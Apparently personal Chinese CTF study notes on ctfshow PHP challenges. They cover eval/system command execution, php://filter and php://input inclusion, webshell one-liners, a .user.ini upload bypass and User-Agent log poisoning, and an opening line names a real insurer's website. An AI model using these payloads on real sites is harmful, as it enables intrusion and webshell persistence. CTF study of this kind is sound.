阳光保险网站wordpress phpwind
RCE
第一题
eval代码执行 : 1、使用system 加通配符过滤
?c=system("tac%20fl*") ;
2、反字节执行 `xxx`
%20
echo + 反字节
3、变量转移
重新定义一个变量 让他代替我们执行
4、伪协议玩法
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
或者直接写入木马 file_put_contents(11.php,"<?php eval($_POST['cmd'])?>");
5、拷贝
?c=system("cp fla* 1.txt")
访问1.txt
复习完练习一个
代码执行
当然还是可以使用伪协议
复习之
文件上传漏洞
ctfshow练习
看介绍是前端的验证 :
玩法 :欺骗前端验证
使用gzl生成一个
改为 jpg后缀 之后上传
知道密码之后如果木马是post方式的传输就能使用这个post口直接进行传输
2、
后端的验证要严密 :
为了防止后端验证文件头 所以写个假的文件头 让它去验证
利用第一个的老套路居然上传成功了这是我没想到的
3、黑名单绕过 :
我们上传的文件只有png能上传成功说明是后端的waf
改一下ini为png后缀一会再改名 .user.ini
写入 :
auto_prepend_file=shell.png
上传一个 木马文件 shell.png
记住在 /upload下执行命令
文件包含
主要涉及到文件的读取,写入,代码执行
1个题全部展示
文件的读取 :
file=php://filter/read=convert.base64-encode/resource=flag.php
把这个base64解密就出来了
2、文件的写入
换一个单词就能用
在post中写入就行 但是这个的条件是有 file_put_contents
这个好用:
php://input
POST <?php fputs(fopen("shell.php","w") , '<?php @eval($_POST["pass"])?>')?>
文件的写入在ctf中非常麻烦所以不常用 同时上边文件的读取不知道 flag 的位置瞎猜也是非常难受 所以下边这个 命令执行非常牛x
3、命令执行
上边的写入其实就是命令的执行啊
php://input 加post就是这种
写上之后就能执行命令了很强
再一个就是 data 协议
利用data协议实现代码执行
使用加密
还有一个就是 文件包含的唯一真神 只要看着一堆 waf 绕不过了 直接使用
非常不吃操作
只需要记住 不同2个中间件的日志
apache : /www/log/apache/access.log
nginx : /www/log/nginx/access.log
怎么判断是哪个?
根据报错发现我们的路径错误了
抓个包 改一下这个ua头信息为恶意的木马
就成功注入了